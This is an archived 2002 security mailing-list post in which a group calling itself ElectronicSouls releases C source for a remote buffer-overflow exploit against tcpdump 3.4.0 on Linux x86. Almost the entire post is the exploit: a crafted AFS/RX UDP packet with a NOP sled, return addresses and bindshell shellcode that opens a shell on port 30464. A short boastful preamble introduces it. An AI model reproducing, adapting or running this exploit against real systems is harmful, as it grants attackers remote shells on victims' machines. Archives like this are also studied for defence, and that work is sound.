| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <200211290811.gAT8Bjx6062354@mailserver2.hushmail.com>
From: es at hush.com (es@...h.com)
Subject: [ElectronicSouls] - tcpdump exploit
-----BEGIN PGP SIGNED MESSAGE-----
Dear List,
We are releasing this for political reasons. We don't need to backdoor
tcpdump to get root on you, like those scriptkiddies do, we can find
our own bugs to exploit from mailing lists and then write our exploits.
Enjoy.
# cat ES-tcpdump-xp-not-finished.c
/*
* MAD PRIVATE !%&#*
* Linux x86 Tcpdump 3.4.0 (maybe others!) Remote Exploit (with -s 500 or higher)
* (C) BrainStorm - ElectronicSouls - \x45\x53 0wnez ;)
* DO NOT DISTRIBUTE !
*/
#include <stdio.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <arpa/inet.h>
#define ADDR 0xbffff248
#define OFFSET 0
#define NUM_ADDR 10
#define NOP 0x90
#define NUM_NOP 100
#define RX_CLIENT_INITIATED 1
#define RX_PACKET_TYPE_DATA 1
#define FS_RX_DPORT 7000
#define FS_RX_SPORT 7001
#define AFS_CALL 134
struct rx_header
{
u_int32_t epoch;
u_int32_t cid;
u_int32_t callNumber;
u_int32_t seq;
u_int32_t serial;
u_char type;
u_char flags;
u_char userStatus;
u_char securityIndex;
u_short spare;
u_short serviceId;
};
char shellcode[] = /* Taeho Oh bindshell code at port 30464 */
"\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x43\xeb\x43\x5e\x31\xc0"
"\x31\xdb\x89\xf1\xb0\x02\x89\x06\xb0\x01\x89\x46\x04\xb0\x06"
"\x89\x46\x08\xb0\x66\xb3\x01\xcd\x80\x89\x06\xb0\x02\x66\x89"
"\x46\x0c\xb0\x77\x66\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31"
"\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0\x66\xb3\x02\xcd\x80"
"\xeb\x04\xeb\x55\xeb\x5b\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04"
"\xcd\x80\x31\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\xb3\x05\xcd"
"\x80\x88\xc3\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80"
"\xb0\x3f\xb1\x02\xcd\x80\xb8\x2f\x62\x69\x6e\x89\x06\xb8\x2f"
"\x73\x68\x2f\x89\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89"
"\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31"
"\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x5b\xff\xff\xff";
long resolve(char *name)
{
struct hostent *hp;
long ip;
if ((ip=inet_addr(name))==-1) {
if ((hp=gethostbyname(name))==NULL) {
fprintf (stderr,"Can't resolve host name [%s].\n",name);
exit(-1);
}
memcpy(&ip,(hp->h_addr),4);
}
return(ip);
}
int main (int argc, char *argv[]) {
struct sockaddr_in addr,sin;
int sock,aux, offset=OFFSET;
char buffer[4048], *chptr;
struct rx_header *rxh;
long int *lptr, return_addr=ADDR;
fprintf(stderr,"\n\n [ E l e c t r o n i c S o u l s ] \n");
fprintf(stderr,"Tcpdump 3.4.0 Remote Exploit by BrainStorm\n\n");
if (argc<2)
{
printf("Usage: %s <host> [offset]\n",argv[0]);
exit(-1);
}
if (argc==3) offset=atoi(argv[2]);
return_addr+=offset;
fprintf(stderr,"[+] Using return addr: %#x\n",return_addr);
addr.sin_family=AF_INET;
addr.sin_addr.s_addr=resolve(argv[1]);
addr.sin_port=htons(FS_RX_DPORT);
if ((sock=socket(AF_INET, SOCK_DGRAM,0))<0)
{
perror("socket()");
exit(-1);
}
sin.sin_family=AF_INET;
sin.sin_addr.s_addr=INADDR_ANY;
sin.sin_port=htons(FS_RX_SPORT);
if (bind(sock,(struct sockaddr*)&sin,sizeof(sin))<0) {
perror("bind()");
exit(-1);
}
memset(buffer,0,sizeof(buffer));
rxh=(struct rx_header *)buffer;
rxh->type=RX_PACKET_TYPE_DATA;
rxh->seq=htonl(1);
rxh->flags=RX_CLIENT_INITIATED;
lptr=(long int *)(buffer+sizeof(struct rx_header));
*(lptr++)=htonl(AFS_CALL);
*(lptr++)=htonl(1);
*(lptr++)=htonl(2);
*(lptr++)=htonl(3);
*(lptr++)=htonl(420);
chptr=(char *)lptr;
sprintf(chptr,"1 0\n");
chptr+=4;
memset(chptr,'A',120);
chptr+=120;
lptr=(long int *)chptr;
for (aux=0;aux<NUM_ADDR;aux++) *(lptr++)=return_addr;
chptr=(char *)lptr;
memset(chptr,NOP,NUM_NOP);
chptr+=NUM_NOP;
shellcode[30]=(char)(46);
memcpy(chptr,shellcode,strlen(shellcode));
chptr+=strlen(shellcode);
sprintf(chptr," 1\n");
if (sendto(sock,buffer,520,0,&addr,sizeof(addr))==-1)
{
perror("send()");
exit(-1);
}
fprintf(stderr,"Overflow sent, now wait for your shell =) ..\n\n");
close(sock);
return(0);
}
#
The Electronic Souls Crew
[ElectronicSouls] (c) 2002
"Winner of the Best Eyes Award"
-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify
wlMEARECABMFAj3nIU8MHGVzQGh1c2guY29tAAoJEN5nGqhGcjltGnYAnRPF4oJBlaU0
2AGLKlLdTNrRinezAJ9EpWGLb2K8esivw+01R5LKf4mCxQ==
=Bh2L
-----END PGP SIGNATURE-----
Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2
Big $$$ to be made with the HushMail Affiliate Program:
https://www.hushmail.com/about.php?subloc=affiliate&l=427
Powered by blists - more mailing lists